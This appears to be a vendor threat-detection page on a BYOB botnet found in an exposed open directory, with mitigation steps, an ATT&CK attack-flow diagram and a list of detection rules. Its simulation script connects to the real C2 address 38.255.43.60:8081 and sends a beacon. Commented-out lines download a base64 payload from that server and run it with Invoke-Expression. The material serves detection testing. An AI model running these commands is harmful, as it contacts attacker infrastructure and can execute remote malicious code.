Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report describes how an open directory on a command‑and‑control server exposed a complete BYOB (Build Your Own Botnet) deployment. The server hosted droppers, stagers and a full RAT for Windows, Linux and macOS. Multiple persistence mechanisms and post‑exploitation modules such as keylogging, email harvesting and packet capture were recovered. Two of the five infrastructure nodes also ran XMRig cryptocurrency miners.
Investigation
Researchers used open‑directory intelligence to download the entire BYOB framework from IP 38.255.43.60. They reverse‑engineered the three‑stage infection chain, identified anti‑VM checks, persistence techniques, and various collection modules. Infrastructure analysis revealed five C2 nodes across the United States, Singapore and Panama, with dual use for remote access and cryptomining. Enrichment added geolocation, ASN and provider details.
Mitigation
Limit unauthorized Python execution and enforce application control. Monitor creation of startup .url files, registry Run keys, scheduled tasks and WMI subscriptions. Detect outbound HTTP to uncommon ports (8080‑8083) and repeated‑slash URL patterns. Deploy EDR to alert on in‑memory loaders and COM automation of Outlook.
Response
Block the identified C2 IPs and ports at the network perimeter. Isolate affected hosts, capture memory images, and remove all observed persistence artifacts. Review logs for additional C2 traffic and lateral movement. Conduct forensic analysis to identify exfiltrated data.
"graph TB %% Class definitions classDef technique fill:#99ccff classDef persistence fill:#ffcc99 classDef escalation fill:#ff9966 classDef action fill:#99ff99 classDef exfil fill:#ff9999 %% Nodes u2013 Techniques tech_dropper_python["<b>Technique</b> – <b>T1059.006 Python</b><br/><b>Description</b>: Execute malicious Python code via interpreter."] class tech_dropper_python technique tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscation</b><br/><b>Description</b>: Encode or compress payloads (Base64, Zlib, Marshal) to hide intent."] class tech_obfuscation technique tech_stager["<b>Technique</b> – <b>T1497.002 System Checks</b><br/><b>Description</b>: Perform antiu2011VM and sandbox checks before proceeding."] class tech_stager technique tech_http_retrieval["<b>Technique</b> – <b>T1071.001 Web Protocols / T1571 Nonu2011Standard Port</b><br/><b>Description</b>: Retrieve additional payloads over HTTP using uncommon ports."] class tech_http_retrieval technique tech_multistage["<b>Technique</b> – <b>T1104 Multiu2011Stage Channels</b><br/><b>Description</b>: Use several communication stages to hide C2 traffic."] class tech_multistage technique %% Node u2013 Persistence grouping persistence_mech["<b>Persistence</b> – Collection of mechanisms used to maintain foothold."] class persistence_mech persistence %% Persistence techniques pers_registry_run["<b>Technique</b> – <b>T1547.001 Registry Run Key</b><br/><b>Description</b>: Add entries under HKCU/HKLM Run keys for autou2011start."] class pers_registry_run persistence pers_startup_url["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Drop a .eu.url file in the Startup folder to execute on login."] class pers_startup_url persistence pers_scheduled_task["<b>Technique</b> – <b>T1053.005 Scheduled Task</b><br/><b>Description</b>: Create a scheduled task to run malicious code at defined intervals."] class pers_scheduled_task persistence pers_wmi_subscription["<b>Technique</b> – <b>T1546.003 WMI Event Subscription</b><br/><b>Description</b>: Register a WMI event that triggers payload execution."] class pers_wmi_subscription persistence pers_launchagent["<b>Technique</b> – <b>T1543.001 Launch Agent (macOS)</b><br/><b>Description</b>: Install a launch agent plist for persistence on macOS."] class pers_launchagent persistence pers_launchdaemon["<b>Technique</b> – <b>T1543.004 Launch Daemon (macOS)</b><br/><b>Description</b>: Install a launch daemon plist for systemu2011wide persistence on macOS."] class pers_launchdaemon persistence %% Privilege escalation esc_uac_bypass["<b>Technique</b> – <b>T1548.002 Bypass UAC</b><br/><b>Description</b>: Exploit UAC weaknesses to obtain elevated privileges."] class esc_uac_bypass escalation %% Additional actions act_keylogging["<b>Action</b> – <b>T1056.001 Keylogging</b><br/><b>Description</b>: Capture user keystrokes for credential theft."] class act_keylogging action act_process_discovery["<b>Action</b> – <b>T1057 Process Discovery</b><br/><b>Description</b>: Enumerate running processes to map the environment."] class act_process_discovery action act_network_sniffing["<b>Action</b> – <b>T1040 Network Sniffing</b><br/><b>Description</b>: Capture network packets to gather additional data."] class act_network_sniffing action act_outlook_collection["<b>Action</b> – <b>T1114.001 Outlook Email Collection</b><br/><b>Description</b>: Harvest email data from Outlook stores."] class act_outlook_collection action exfil_c2["<b>Exfiltration</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Send collected data back through the established C2 channel."] class exfil_c2 exfil %% Connections u2013 Attack Flow tech_dropper_python –>|executes| tech_obfuscation tech_obfuscation –>|prepares| tech_stager tech_stager –>|launches| tech_http_retrieval tech_http_retrieval –>|downloads| tech_multistage tech_multistage –>|establishes| persistence_mech persistence_mech –>|uses| pers_registry_run persistence_mech –>|uses| pers_startup_url persistence_mech –>|uses| pers_scheduled_task persistence_mech –>|uses| pers_wmi_subscription persistence_mech –>|uses| pers_launchagent persistence_mech –>|uses| pers_launchdaemon tech_multistage –>|enables| esc_uac_bypass tech_multistage –>|enables| act_keylogging tech_multistage –>|enables| act_process_discovery tech_multistage –>|enables| act_network_sniffing tech_multistage –>|enables| act_outlook_collection tech_multistage –>|enables| exfil_c2 "
Attack Flow
Detections
Possible IP Lookup Domain Communications Attempted (via dns)
View
Possible Defense Evasion by Use of Base64 Command (via cmdline)
View
Suspicious Taskkill Execution (via cmdline)
View
Attrib Execution to Hide Files (via cmdline)
View
Suspicious File Download Direct IP (via proxy)
View
Cron File Was Created (via file_event)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Suspicious MacOS – Plist Locations and Names (via file_event)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
IOCs (DestinationIP) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS
View
IOCs (SourceIP) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS
View
IOCs (HashMd5) to detect: Exposed Open Directory Leaks a Full BYOB Deployment Across Windows, Linux, and macOS
View
Detection of BYOB Malware Execution and Process Manipulation [Windows Process Creation]
View
Detection of BYOB Malware Persistence via Registry Run Key [Windows Registry Event]
View
Detection of BYOB C2 Communication and IP Check [Windows Network Connection]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Public‑IP Discovery: The attacker runs a PowerShell one‑liner to obtain its external IP via
api.ipify.org. This generates a DNS query forapi.ipify.org, satisfying the rule’sdomainselector. - C2 Contact: Using the discovered IP (or regardless of it), the attacker initiates a TCP connection to the hard‑coded BYOB C2 server at
38.255.43.60on port8081. The firewall logs this outbound connection, matching bothdst_ipanddst_portselectors. - Payload Retrieval (optional): The attacker downloads a base64‑encoded payload, decodes, and executes it – representing downstream techniques (e.g., T1140, T1059.006).
- Public‑IP Discovery: The attacker runs a PowerShell one‑liner to obtain its external IP via
-
Regression Test Script:
# ------------------------------------------------- # BYOB C2 Communication & Public IP Discovery Test # ------------------------------------------------- # Step 1: Discover public IP via api.ipify.org try { $publicIp = Invoke-RestMethod -Uri "https://api.ipify.org?format=text" -Method Get -TimeoutSec 5 Write-Host "Public IP discovered: $publicIp" } catch { Write-Warning "Failed to query api.ipify.org – aborting test." exit 1 } # Step 2: Establish C2 connection to hard‑coded server $c2Ip = "38.255.43.60" $c2Port = 8081 # Use a simple TCP client to generate firewall traffic $client = New-Object System.Net.Sockets.TcpClient try { $client.Connect($c2Ip, $c2Port) Write-Host "Connected to C2 $c2Ip:$c2Port" # Send a lightweight beacon (optional) $stream = $client.GetStream() $payload = [System.Text.Encoding]::ASCII.GetBytes("beacon`n") $stream.Write($payload,0,$payload.Length) $stream.Flush() } catch { Write-Warning "Unable to connect to C2 endpoint – ensure network egress is allowed." } finally { $client.Close() } # Optional: Retrieve a mock payload (simulated) # $maliciousCode = Invoke-WebRequest -Uri "http://$c2Ip/payload.b64" -UseBasicParsing # $decoded = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($maliciousCode.Content)) # Invoke-Expression $decoded -
Cleanup Commands:
# No persistent artifacts were created. Just ensure any lingering connections are closed. # Verify no orphaned TcpClient objects remain (PowerShell automatically disposes them). Write-Host "Cleanup complete – no residual processes."